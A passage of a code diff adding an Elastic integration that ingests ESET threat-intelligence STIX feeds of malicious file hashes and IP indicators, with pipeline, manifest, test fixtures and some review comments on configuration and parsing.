indicates that a variant of JS/ScrInject.B trojan is present.\", \"pattern\": \"[file:hashes.'SHA-256'='f772194ec4bc9baf384bbee2e483e09ba2f4b9d3b2fbba2978b667c0447bb4c2'] OR [file:hashes.'SHA-1'='74dc6715edd2fcfd12f28359f3efca038e9300ac'] OR [file:hashes.'MD5'='46f845c419d4ed6c899bde1b3a16c344']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T01:59:23Z\", \"valid_until\": \"2023-10-17T01:59:23Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Malicious Files stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of JS/ScrInject.B trojan is present.", + "file": { + "hash": { + "md5": "46f845c419d4ed6c899bde1b3a16c344", + "sha1": "74dc6715edd2fcfd12f28359f3efca038e9300ac", + "sha256": "f772194ec4bc9baf384bbee2e483e09ba2f4b9d3b2fbba2978b667c0447bb4c2" + } + }, + "last_seen": "2023-10-15T01:59:23.000Z", + "modified_at": "2023-10-15T01:59:23.000Z", + "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-10-15T01:59:23.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--abab1f5a-69bb-4703-baaf-1579f0717d5a", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T01:59:23.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--abab1f5a-69bb-4703-baaf-1579f0717d5a\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T01:59:23.000Z\", \"modified\": \"2023-10-15T01:59:23.000Z\", \"name\": \"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\", \"description\": \"Each of these file hashes indicates that a variant of HTML/Refresh.AUD trojan is present.\", \"pattern\": 
\"[file:hashes.'SHA-256'='a3ac8a9425b52564fddf4309d2ae597a48b70df5deed2b08bd1cf92bdbe6aba3'] OR [file:hashes.'SHA-1'='8a4489c702681aab936aa931b6df312c2720c119'] OR [file:hashes.'MD5'='9bd51aabb0b341a7d072794394e09f86']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T01:59:23Z\", \"valid_until\": \"2023-10-17T01:59:23Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Malicious Files stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of HTML/Refresh.AUD trojan is present.", + "file": { + "hash": { + "md5": "9bd51aabb0b341a7d072794394e09f86", + "sha1": "8a4489c702681aab936aa931b6df312c2720c119", + "sha256": "a3ac8a9425b52564fddf4309d2ae597a48b70df5deed2b08bd1cf92bdbe6aba3" + } + }, + "last_seen": "2023-10-15T01:59:23.000Z", + "modified_at": "2023-10-15T01:59:23.000Z", + "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-10-15T01:59:23.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--9baf483f-9dd8-464b-ab81-22e729547c59", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T01:59:23.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--9baf483f-9dd8-464b-ab81-22e729547c59\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T01:59:23.000Z\", \"modified\": \"2023-10-15T01:59:23.000Z\", \"name\": \"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\", \"description\": \"Each of these file hashes indicates that a variant of HTML/Phishing.Agent.AUW trojan is present.\", \"pattern\": \"[file:hashes.'SHA-256'='c75b7ec26ef3d6ce1578e0c80ecf124285c0714da0023813bc45f6141f4c5fb5'] OR 
[file:hashes.'SHA-1'='aacb3c991ce8b1fcc92b353fb82a71cb45487e5e'] OR [file:hashes.'MD5'='73631f9ce0efc3e9ac1d296fcc5af3aa']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T01:59:23Z\", \"valid_until\": \"2023-10-17T01:59:23Z\", \"labels\": [\"malicious-activity\"]}",
+ "type": [
+ "indicator"
+ ]
+ },
+ "tags": [
+ "preserve_original_event"
+ ],
+ "threat": {
+ "feed": {
+ "name": "ESET Malicious Files stix 2.1"
+ },
+ "indicator": {
+ "confidence": "High",
+ "description": "Each of these file hashes indicates that a variant of HTML/Phishing.Agent.AUW trojan is present.",
+ "file": {
+ "hash": {
+ "md5": "73631f9ce0efc3e9ac1d296fcc5af3aa",
+ "sha1": "aacb3c991ce8b1fcc92b353fb82a71cb45487e5e",
+ "sha256": "c75b7ec26ef3d6ce1578e0c80ecf124285c0714da0023813bc45f6141f4c5fb5"
+ }
+ },
+ "last_seen": "2023-10-15T01:59:23.000Z",
+ "modified_at": "2023-10-15T01:59:23.000Z",
+ "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7",
+ "provider": "eset",
+ "type": "file"
+ }
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/packages/ti_eset/data_stream/files/_dev/test/system/test-httpjson-config.yml b/packages/ti_eset/data_stream/files/_dev/test/system/test-httpjson-config.yml
new file mode 100644
index 00000000000..a03c8b365a9
--- /dev/null
+++ b/packages/ti_eset/data_stream/files/_dev/test/system/test-httpjson-config.yml
@@ -0,0 +1,13 @@
+input: httpjson
+service: eti
+vars:
+ username: test
+ password: test
+data_stream:
+ vars:
+ preserve_original_event: true
+ url: http://{{Hostname}}:{{Port}}/taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/ee6a153ed77e4ec3ab21e76cc2074b9f/objects/
+ interval: 30s
+ enable_request_tracer: true
+assert:
+ hit_count: 2
diff --git a/packages/ti_eset/data_stream/files/agent/stream/httpjson.yml.hbs b/packages/ti_eset/data_stream/files/agent/stream/httpjson.yml.hbs
new file mode 100644
index 00000000000..41117cedade
--- /dev/null
+++ b/packages/ti_eset/data_stream/files/agent/stream/httpjson.yml.hbs
@@ -0,0 +1,72 @@
+config_version: "2"
+
+interval: {{interval}}
+request.method: "GET"
+{{#if enable_request_tracer}}
+request.tracer.filename: "../../logs/httpjson/http-request-trace-*.ndjson"
+{{/if}}
+
+auth.basic.user: {{username}}
+auth.basic.password: {{password}}
+
+{{#if url}}
+request.url: {{url}}
+{{/if}}
+{{#if ssl}}
+request.ssl: {{ssl}}
+{{/if}}
+{{#if http_client_timeout}}
+request.timeout: {{http_client_timeout}}
+{{/if}}
+{{#if proxy_url}}
+request.proxy_url: {{proxy_url}}
+{{/if}}
+
+request.transforms:
+ - set:
+ target: header.Content-Type
+ value: application/taxii+json;version=2.1
+ - set:
+ target: header.Accept
+ value: application/taxii+json;version=2.1
+ - set:
+ target: url.params.match[type]
+ value: indicator
+ - set:
+ target: url.params.limit
+ value: {{page_size}}
+ - set:
+ target: url.params.added_after
+ value: '[[ .cursor.timestamp ]]'
+ default: '[[ formatDate (now (parseDuration "-{{initial_interval}}")) "2006-01-02T15:04:05.000Z" ]]'
+
+response.pagination:
+ - set:
+ target: url.params.added_after
+ value: >-
+ [[ if .last_response.body.more ]][[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ end ]]
+ fail_on_template_error: true
+
+response.split:
+ target: body.objects
+
+cursor:
+ timestamp:
+ value: >-
+ [[ if .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ else ]][[.last_response.url.params.Get "added_after"]][[ end ]]
+ ignore_empty_value: true
+
+tags:
+{{#if preserve_original_event}}
+ - preserve_original_event
+{{/if}}
+{{#each tags as |tag|}}
+ - {{tag}}
+{{/each}}
+{{#contains "forwarded" tags}}
+publisher_pipeline.disable_host: true
+{{/contains}}
+{{#if processors}}
+processors:
+{{processors}}
+{{/if}}
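Review bot: `url.params.limit` is set from `{{page_size}}` unconditionally, while every other optional variable in this template (`url`, `ssl`, `http_client_timeout`, `proxy_url`) is wrapped in `{{#if}}`; if `page_size` has no default in the manifest (not in this diff) the transform renders `value:` with nothing after it and the request goes out with an empty `limit`. Wrapping that transform in `{{#if page_size}} … {{/if}}` like the others keeps the rendered YAML well-formed either way. Separately, the `request.tracer.filename` line dumps the full HTTP exchange to `../../logs/httpjson/`, which to my knowledge includes the `Authorization` header built from `{{username}}`/`{{password}}`; the manifest's description of `enable_request_tracer` is outside this hunk and should state that the trace file contains the feed credentials and is meant for short-lived debugging only.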
diff --git a/packages/ti_eset/data_stream/files/elasticsearch/ilm/default_policy.json b/packages/ti_eset/data_stream/files/elasticsearch/ilm/default_policy.json
new file mode 100644
index 00000000000..459c9fffc4e
--- /dev/null
+++ b/packages/ti_eset/data_stream/files/elasticsearch/ilm/default_policy.json
@@ -0,0 +1,23 @@
+{
+ "policy": {
+ "phases": {
+ "delete": {
+ "actions": {
+ "delete": {}
+ },
+ "min_age": "7d"
+ },
+ "hot": {
+ "actions": {
+ "rollover": {
+ "max_age": "2d",
+ "max_size": "50gb"
+ },
+ "set_priority": {
+ "priority": 100
+ }
+ }
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/packages/ti_eset/data_stream/files/elasticsearch/ingest_pipeline/default.yml b/packages/ti_eset/data_stream/files/elasticsearch/ingest_pipeline/default.yml
new file mode 100644
index 00000000000..d9a64f4d2b4
--- /dev/null
+++ b/packages/ti_eset/data_stream/files/elasticsearch/ingest_pipeline/default.yml
@@ -0,0 +1,149 @@
+---
+description: Pipeline for processing malicious files collection feed
+processors:
+ - set:
+ field: ecs.version
+ value: '8.11.0'
+ - set:
+ field: event.kind
+ value: enrichment
+ - append:
+ field: event.category
+ value: threat
+ allow_duplicates: false
+ - append:
+ field: event.type
+ value: indicator
+ allow_duplicates: false
+ - set:
+ field: threat.indicator.provider
+ value: eset
+ - rename:
+ field: message
+ target_field: event.original
+ ignore_missing: true
+ if: ctx.event?.original == null
+ - json:
+ field: event.original
+ target_field: eti
+ - drop:
+ if: ctx.eti?.type != 'indicator'
+ - set:
+ field: threat.feed.name
+ value: "ESET Malicious Files stix 2.1"
+ - date:
+ field: eti.created
+ target_field: "@timestamp"
+ formats:
+ - "ISO8601"
+ if: "ctx.eti?.created != null"
+ - date:
+ field: eti.modified
+ target_field: threat.indicator.last_seen
+ formats:
+ - "ISO8601"
+ if: "ctx.eti?.modified != null"
+ - set:
+ field: threat.indicator.modified_at
+ copy_from: threat.indicator.last_seen
+ if: "ctx.threat?.indicator?.last_seen != null"
+ - date:
+ field: eti.valid_until
+ target_field: eset.valid_until
+ formats:
+ - "ISO8601"
+ if: "ctx.eti?.valid_until != null"
+ - rename:
+ field: eti.id
+ target_field: eset.id
+ ignore_missing: true
+ - rename:
+ field: eti.description
+ target_field: threat.indicator.description
+ ignore_missing: true
+ - foreach:
+ field: eti.labels
+ processor:
+ append:
+ field: eset.labels
+ value: "{{_ingest._value}}"
+ ignore_missing: true
+ ignore_failure: true
+ if: ctx.eti?.labels != null
+ - script:
+ lang: painless
+ params:
+ "malicious-activity": 'High'
+ "phishing-activity": 'High'
+ "unwanted-activity": 'Medium'
+ "benign": 'Low'
+ if: ctx.eset?.labels != null
+ source: >
+ for (def label : ctx.eset.labels) {
+ if (params.containsKey(label)) {
+ ctx.threat.indicator.confidence = params.get(label);
+ break;
+ }
+ }
+ - split:
+ field: eti.pattern
+ target_field: eti._patterns
+ separator: ' OR '
+ ignore_missing: true
+ - foreach:
+ field: eti._patterns
+ processor:
+ grok:
+ field: _ingest._value
+ patterns:
+ - "^\\[?file:hashes.'MD5'%{SPACE}=%{SPACE}'%{DATA:threat.indicator.file.hash.md5}'\\]?"
+ - "^\\[?file:hashes.'SHA-1'%{SPACE}=%{SPACE}'%{DATA:threat.indicator.file.hash.sha1}'\\]?"
+ - "^\\[?file:hashes.'SHA-256'%{SPACE}=%{SPACE}'%{DATA:threat.indicator.file.hash.sha256}'\\]?"
+ ignore_failure: true
+ - set:
+ field: threat.indicator.type
+ value: file
+ - set:
+ field: threat.indicator.name
+ copy_from: eti.name
+ if: "ctx.eti?.name != null"
+ - remove:
+ field:
+ - eti
+ ignore_missing: true
+ - remove:
+ field: event.original
+ if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))"
+ ignore_failure: true
+ ignore_missing: true
+ - script:
+ tag: script_to_drop_null_values
+ lang: painless
+ description: Drops null/empty values recursively.
+ source: |-
+ boolean drop(Object o) {
+ if (o == null || o == '') {
+ return true;
+ } else if (o instanceof Map) {
+ ((Map) o).values().removeIf(v -> drop(v));
+ return (((Map) o).size() == 0);
+ } else if (o instanceof List) {
+ ((List) o).removeIf(v -> drop(v));
+ return (((List) o).length == 0);
+ }
+ return false;
+ }
+ drop(ctx);
+ - append:
+ field: event.kind
+ value: pipeline_error
+ allow_duplicates: false
+ if: ctx.error?.message != null
+on_failure:
+ - set:
+ field: error.message
+ value: '{{ _ingest.on_failure_message }}'
+ - set:
+ field: event.kind
+ tag: set_pipeline_error_to_event_kind
+ value: pipeline_error
diff --git a/packages/ti_eset/data_stream/files/fields/agent.yml b/packages/ti_eset/data_stream/files/fields/agent.yml
new file mode 100644
index 00000000000..845b84ed9c0
--- /dev/null
+++ b/packages/ti_eset/data_stream/files/fields/agent.yml
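Review bot: The three grok patterns in the `eti._patterns` foreach capture the digest with `%{DATA}`, so whatever sits between the quotes — not only a hex digest — is stored in `threat.indicator.file.hash.md5`/`sha1`/`sha256`, the fields that indicator-match rules compare against; a malformed or tampered feed entry would thus become a live indicator instead of being rejected. Constraining each capture to the expected digest shape, e.g. `pattern_definitions: { MD5HEX: '[a-fA-F0-9]{32}' }` and `%{MD5HEX:threat.indicator.file.hash.md5}` (40 hex chars for SHA-1, 64 for SHA-256), makes grok fail on anything else, and with `ignore_failure: true` already set the document still passes through, just without the bad hash. The `split` on `' OR '` also only handles a flat disjunction; a comment above it such as `# Assumes the STIX pattern is a flat OR of file:hashes comparisons; AND/FOLLOWEDBY patterns are not parsed.` would record that assumption for the next maintainer. Finally `threat.indicator.type: file` is set even when no hash was extracted; guarding it with `if: ctx.threat?.indicator?.file?.hash != null` keeps documents without a parsed hash from claiming a file indicator.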
@@ -0,0 +1,201 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. 
+- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' 
+ - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type. 
diff --git a/packages/ti_eset/data_stream/files/fields/base-fields.yml b/packages/ti_eset/data_stream/files/fields/base-fields.yml
new file mode 100644
index 00000000000..7c798f4534c
--- /dev/null
+++ b/packages/ti_eset/data_stream/files/fields/base-fields.yml
@@ -0,0 +1,12 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: '@timestamp'
+ type: date
+ description: Event timestamp.
diff --git a/packages/ti_eset/data_stream/files/fields/ecs.yml b/packages/ti_eset/data_stream/files/fields/ecs.yml
new file mode 100644
index 00000000000..43534883f1c
--- /dev/null
+++ b/packages/ti_eset/data_stream/files/fields/ecs.yml
@@ -0,0 +1,42 @@
+- external: ecs
+ name: ecs.version
+- external: ecs
+ name: message
+- external: ecs
+ name: error.message
+- external: ecs
+ name: event.category
+- external: ecs
+ name: event.ingested
+- external: ecs
+ name: event.kind
+- external: ecs
+ name: event.original
+- external: ecs
+ name: event.created
+- external: ecs
+ name: tags
+- external: ecs
+ name: threat.indicator.name
+- external: ecs
+ name: threat.indicator.confidence
+- external: ecs
+ name: threat.indicator.provider
+- external: ecs
+ name: threat.indicator.url.original
+- external: ecs
+ name: threat.indicator.file.hash.md5
+- external: ecs
+ name: threat.indicator.file.hash.sha1
+- external: ecs
+ name: threat.indicator.file.hash.sha256
+- external: ecs
+ name: threat.indicator.type
+- external: ecs
+ name: threat.indicator.description
+- external: ecs
+ name: threat.indicator.modified_at
+- external: ecs
+ name: threat.indicator.last_seen
+- external: ecs
+ name: threat.feed.name
diff --git a/packages/ti_eset/data_stream/files/fields/fields.yml b/packages/ti_eset/data_stream/files/fields/fields.yml
new file mode 100644
index 00000000000..bf7e7383df2
--- /dev/null
+++ b/packages/ti_eset/data_stream/files/fields/fields.yml
@@ -0,0 +1,21 @@
+- name: eset
+ type: group
+ description: >
+ Fields for ESET Threat Intelligence
+
+ fields:
+ - name: id
+ type: keyword
+ description: The UID of the event object.
+ - name: valid_until
+ type: date
+ description: >-
+ Event expiration date.
+ - name: labels
+ type: keyword
+ description: >-
+ Threat labels.
+- name: labels.is_ioc_transform_source
+ type: constant_keyword
+ value: 'true'
+ description: Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators.
diff --git a/packages/ti_eset/data_stream/files/lifecycle.yml b/packages/ti_eset/data_stream/files/lifecycle.yml
new file mode 100644
index 00000000000..326b14e00f6
--- /dev/null
+++ b/packages/ti_eset/data_stream/files/lifecycle.yml
@@ -0,0 +1 @@
+data_retention: 7d
diff --git a/packages/ti_eset/data_stream/files/manifest.yml b/packages/ti_eset/data_stream/files/manifest.yml
new file mode 100644
index 00000000000..3f76d82a9ea
--- /dev/null
+++ b/packages/ti_eset/data_stream/files/manifest.yml
@@ -0,0 +1,95 @@ +title: "Malicious files" +type: logs +ilm_policy: logs-ti_eset.files-default_policy +streams: + - input: httpjson + title: Malicious files + description: Collect data from ETI Malicious file feed + template_path: httpjson.yml.hbs + vars: + - name: url + description: URL with API root and identifier of Malicious files collection as described by [TAXII v2.1 standard](https://docs.oasis-open.org/cti/taxii/v2.1/os/taxii-v2.1-os.html#_Toc31107514) + type: text + title: Collection URL + multi: false + required: true + show_user: true + default: https://taxii.eset.com/taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/ee6a153ed77e4ec3ab21e76cc2074b9f/objects/ + - name: enable_request_tracer + type: bool + title: Enable request tracing + multi: false + required: false + show_user: false + description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details. + - name: http_client_timeout + type: text + title: HTTP Client Timeout + description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h. + multi: false + required: false + show_user: false + default: 1m + - name: proxy_url + type: text + title: Proxy URL + multi: false + required: false + show_user: false + description: URL to proxy connections in the form of http\[s\]://:@: + - name: interval + type: text + title: Interval + description: Interval at which the logs will be pulled. Supported units for this parameter are h/m/s. 
+ multi: false + required: true + show_user: true + default: 1h + - name: initial_interval + type: text + title: Initial Interval + multi: false + required: true + show_user: false + default: 48h + description: How far back to look for indicators the first time the agent is started. Supported units for this parameter are h/m/s. + - name: page_size + type: integer + multi: false + required: false + default: "1000" + show_user: false + title: Page size + description: Maximum number of records to pull in one request. + - name: ssl + type: yaml + title: SSL + multi: false + required: false + show_user: false + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - eset-files + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original` + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: > + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + diff --git a/packages/ti_eset/data_stream/files/sample_event.json b/packages/ti_eset/data_stream/files/sample_event.json new file mode 100644 index 00000000000..9881c7e92bc --- /dev/null +++ b/packages/ti_eset/data_stream/files/sample_event.json 
@@ -0,0 +1,73 @@ +{ + "@timestamp": "2023-10-19T02:00:38.000Z", + "agent": { + "ephemeral_id": "205a7540-b015-4c5a-9534-191e2f7c11f1", + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "ti_eset.files", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "snapshot": false, + "version": "8.12.1" + }, + "eset": { + "id": "indicator--5d7e9ad6-7b48-42fa-8598-d474e8da1b0f", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-21T02:00:38.000Z" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "created": "2024-03-27T14:21:17.805Z", + "dataset": "ti_eset.files", + "ingested": "2024-03-27T14:21:29Z", + "kind": "enrichment", + "original": "{\"created\":\"2023-10-19T02:00:38.000Z\",\"description\":\"Each of these file hashes indicates that a variant of HTML/Phishing.Agent.EVU trojan is present.\",\"id\":\"indicator--5d7e9ad6-7b48-42fa-8598-d474e8da1b0f\",\"labels\":[\"malicious-activity\"],\"modified\":\"2023-10-19T02:00:38.000Z\",\"name\":\"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\",\"pattern\":\"[file:hashes.'SHA-256'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7'] OR [file:hashes.'SHA-1'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7'] OR [file:hashes.'MD5'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-10-19T02:00:38Z\",\"valid_until\":\"2023-10-21T02:00:38Z\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + "forwarded", + "eset-files" + ], + "threat": { + "feed": { + "name": "ESET Malicious Files stix 2.1" + }, + "indicator": { + 
"confidence": "High", + "description": "Each of these file hashes indicates that a variant of HTML/Phishing.Agent.EVU trojan is present.", + "file": { + "hash": { + "md5": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "sha1": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "sha256": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7" + } + }, + "last_seen": "2023-10-19T02:00:38.000Z", + "modified_at": "2023-10-19T02:00:38.000Z", + "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "provider": "eset", + "type": "file" + } + } +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/ip/_dev/test/pipeline/test-common-config.yml b/packages/ti_eset/data_stream/ip/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..4da22641654 --- /dev/null +++ b/packages/ti_eset/data_stream/ip/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,3 @@ +fields: + tags: + - preserve_original_event diff --git a/packages/ti_eset/data_stream/ip/_dev/test/pipeline/test-eset-ndjson.log b/packages/ti_eset/data_stream/ip/_dev/test/pipeline/test-eset-ndjson.log new file mode 100644 index 00000000000..7f0124a3504 --- /dev/null +++ b/packages/ti_eset/data_stream/ip/_dev/test/pipeline/test-eset-ndjson.log 
@@ -0,0 +1,10 @@ +{"id": "indicator--38cddce7-f1e3-49d0-91f6-1423f0e157ca", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:20:04.000Z", "modified": "2023-10-15T02:20:04.000Z", "name": "5.2.75.227", "description": "FTP bruteforce IP", "pattern": "[ipv4-addr:value='1.128.0.0:8080']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:20:04Z", "valid_until": "2023-10-17T02:20:04Z", "labels": ["malicious-activity"]} +{"id": "indicator--dc5b08dd-0c5e-4b7b-902e-cc212be7ee80", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:20:04.000Z", "modified": "2023-10-15T02:20:04.000Z", "name": "5.2.75.227", "description": "MySQL bruteforce IP", "pattern": "[ipv4-addr:value='1.128.0.0']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:20:04Z", "valid_until": "2023-10-17T02:20:04Z", "labels": ["malicious-activity"]} +{"id": "indicator--76c98e1d-aad2-4d3c-9618-95327aa8fb16", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:20:04.000Z", "modified": "2023-10-15T02:20:04.000Z", "name": "5.2.75.227", "description": "Web services scanning and attacks", "pattern": "[ipv4-addr:value='1.128.0.0/11']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:20:04Z", "valid_until": "2023-10-17T02:20:04Z", "labels": ["malicious-activity"]} +{"id": "indicator--e04adbf1-6fd4-4b80-b780-35c9550a36ef", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:20:04.000Z", "modified": "2023-10-15T02:20:04.000Z", "name": "5.2.75.227", "description": "Web services scanning and attacks", "pattern": "[ipv4-addr:value='1.128.0.0/11']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:20:04Z", "valid_until": "2023-10-17T02:20:04Z", "labels": ["malicious-activity"]} +{"id": "indicator--ec0c8daf-33f2-48cc-a377-86e60a30516b", "type": "indicator", "spec_version": "indicator", "created": 
